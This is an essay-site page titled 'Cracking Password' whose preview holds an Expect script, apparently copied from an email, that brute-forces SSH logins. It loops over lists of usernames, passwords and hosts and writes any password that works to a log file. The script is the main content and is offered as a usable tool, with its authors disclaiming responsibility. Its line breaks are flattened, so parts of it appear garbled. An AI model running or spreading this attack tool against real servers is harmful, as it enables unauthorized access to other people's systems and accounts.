ReviewEssays.com - Term Papers, Book Reports, Research Papers and College Essays
Search

Cracking Password

Essay by   •  November 26, 2010  •  Essay  •  340 Words (2 Pages)  •  1,188 Views

Essay Preview: Cracking Password

Report this essay
Page 1 of 2

#!/usr/bin/expect -f # # Written by James Shanahan(jshanahan@comcastpc.com) # and Erin Palmer(epalmer@comcastpc.com) # ssh brute forcer # This will alow you to specify hosts, password lists, and a user # I do not take any reponsibilty for what you do with this tool # Hopefully it will make your life easier rather then making other # peoples lives more difficult! set timeout 5 set dictionary [lindex $argv 0] set file [lindex $argv 1] set user [lindex $argv 2] if {[llength $argv] != 3} { puts stderr "Usage: $argv0 n" exit } set tryHost [open $file r] set tryPass [open $dictionary r] set tryUser [open $user r] set passwords [read $tryPass] set hosts [read $tryHost] set login [read $tryUser] foreach username $login { foreach passwd $passwords { foreach ip $hosts { spawn ssh $username@$ip expect ":"

send "$passwdn" set logFile [open $ip.log a] expect "L" { puts $logFile "password for $username@$ip is $passwdn" close $logFile } set id [exp_pid] exec kill -INT $id } } }

--------------------------------------------------------------------------------

Yahoo! Photos

Ring in the New Year with Photo Calendars. Add photos, events, holidays, whatever.

DeleteReplyForwardSpamMove...

Previous | Next | Back to Messages Save Message Text | Full Headers

...

...

Download as:   txt (1.4 Kb)   pdf (48.6 Kb)   docx (9 Kb)  
Continue for 1 more page »
Only available on ReviewEssays.com